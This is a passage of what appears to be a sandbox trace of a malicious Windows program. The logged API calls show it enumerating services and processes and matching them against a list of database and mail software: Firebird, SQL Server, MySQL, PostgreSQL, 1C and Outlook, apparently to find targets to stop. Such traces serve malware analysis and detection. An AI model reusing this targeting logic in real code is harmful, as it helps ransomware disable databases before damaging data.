(lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.244] lstrlenW (lpString="SamSs") returned 5 [0054.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.244] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.244] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.244] lstrlenW (lpString="Schedule") returned 8 [0054.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.244] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.244] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.244] lstrlenW (lpString="SENS") returned 4 [0054.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.244] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.244] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.244] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.244] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.244] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.244] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.244] lstrlenW (lpString="Spooler") returned 7 [0054.244] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.244] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.245] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.245] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.245] lstrlenW (lpString="swprv") returned 5 [0054.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0054.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0054.245] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0054.245] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0054.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0054.245] lstrlenW (lpString="SysMain") returned 7 [0054.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.245] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.245] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.245] lstrlenW (lpString="Themes") returned 6 [0054.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0054.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0054.245] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0054.245] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0054.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0054.245] lstrlenW (lpString="TrkWks") returned 6 [0054.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0054.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0054.245] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0054.245] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0054.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0054.245] lstrlenW (lpString="UxSms") returned 5 [0054.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0054.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0054.245] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0054.245] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0054.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0054.245] lstrlenW (lpString="VSS") returned 3 [0054.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0054.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0054.246] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0054.246] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0054.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0054.246] lstrlenW (lpString="WdiServiceHost") returned 14 [0054.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0054.246] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0054.246] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0054.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0054.246] lstrlenW (lpString="WdiSystemHost") returned 13 [0054.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0054.246] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0054.246] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0054.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0054.246] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0054.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0054.246] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0054.246] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0054.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0054.246] lstrlenW (lpString="Winmgmt") returned 7 [0054.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0054.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0054.246] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0054.246] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0054.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0054.246] lstrlenW (lpString="WPDBusEnum") returned 10 [0054.246] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.246] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0054.246] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0054.246] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0054.246] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0054.246] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f740a8 | out: hHeap=0x570000) returned 1 [0054.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0054.249] Process32FirstW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.250] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.250] lstrlenW (lpString="System") returned 6 [0054.250] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0054.251] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0054.251] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0054.251] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0054.251] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0054.251] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0054.251] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0054.251] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.251] lstrlenW (lpString="smss.exe") returned 8 [0054.251] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0054.251] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0054.251] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0054.251] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0054.251] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0054.252] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0054.252] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0054.252] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.252] lstrlenW (lpString="csrss.exe") returned 9 [0054.252] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0054.252] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0054.252] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0054.252] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0054.252] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0054.252] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0054.252] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0054.252] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.253] lstrlenW (lpString="wininit.exe") returned 11 [0054.253] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0054.253] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0054.253] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0054.253] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.254] lstrlenW (lpString="csrss.exe") returned 9 [0054.254] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.255] lstrlenW (lpString="winlogon.exe") returned 12 [0054.255] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.255] lstrlenW (lpString="services.exe") returned 12 [0054.255] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.256] lstrlenW (lpString="lsass.exe") returned 9 [0054.256] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0054.257] lstrlenW (lpString="lsm.exe") returned 7 [0054.257] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.258] lstrlenW (lpString="svchost.exe") returned 11 [0054.258] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.258] lstrlenW (lpString="svchost.exe") returned 11 [0054.258] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.259] lstrlenW (lpString="svchost.exe") returned 11 [0054.259] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.260] lstrlenW (lpString="svchost.exe") returned 11 [0054.260] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.260] lstrlenW (lpString="svchost.exe") returned 11 [0054.260] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.261] lstrlenW (lpString="audiodg.exe") returned 11 [0054.261] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.262] lstrlenW (lpString="svchost.exe") returned 11 [0054.262] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.262] lstrlenW (lpString="svchost.exe") returned 11 [0054.263] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.263] lstrlenW (lpString="dwm.exe") returned 7 [0054.263] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.264] lstrlenW (lpString="explorer.exe") returned 12 [0054.264] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.265] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.265] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.265] lstrlenW (lpString="taskhost.exe") returned 12 [0054.265] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.266] lstrlenW (lpString="svchost.exe") returned 11 [0054.266] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0054.267] lstrlenW (lpString="taskeng.exe") returned 11 [0054.267] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.267] lstrlenW (lpString="taskhost.exe") returned 12 [0054.268] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0054.268] lstrlenW (lpString="called.exe") returned 10 [0054.268] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0054.269] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0054.269] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0054.270] lstrlenW (lpString="analyst.exe") returned 11 [0054.270] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0054.270] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0054.270] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0054.271] lstrlenW (lpString="wages.exe") returned 9 [0054.271] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0054.272] lstrlenW (lpString="rand.exe") returned 8 [0054.272] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0054.272] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0054.272] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0054.273] lstrlenW (lpString="cottage.exe") returned 11 [0054.273] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0054.274] lstrlenW (lpString="pairs_spec.exe") returned 14 [0054.274] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0054.275] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0054.275] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0054.275] lstrlenW (lpString="observationshairy.exe") returned 21 [0054.275] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0054.276] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0054.276] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0054.277] lstrlenW (lpString="spectrum.exe") returned 12 [0054.277] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0054.277] lstrlenW (lpString="dies.exe") returned 8 [0054.277] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0054.278] lstrlenW (lpString="configured.exe") returned 14 [0054.278] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0054.279] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0054.279] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0054.279] lstrlenW (lpString="fast.exe") returned 8 [0054.280] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0054.451] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0054.456] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0054.471] lstrlenW (lpString="review.exe") returned 10 [0054.472] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0054.472] lstrlenW (lpString="historybinding.exe") returned 18 [0054.472] Process32NextW (in: hSnapshot=0x240, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0054.473] lstrlenW (lpString="pk task surge.exe") returned 17 [0054.473] 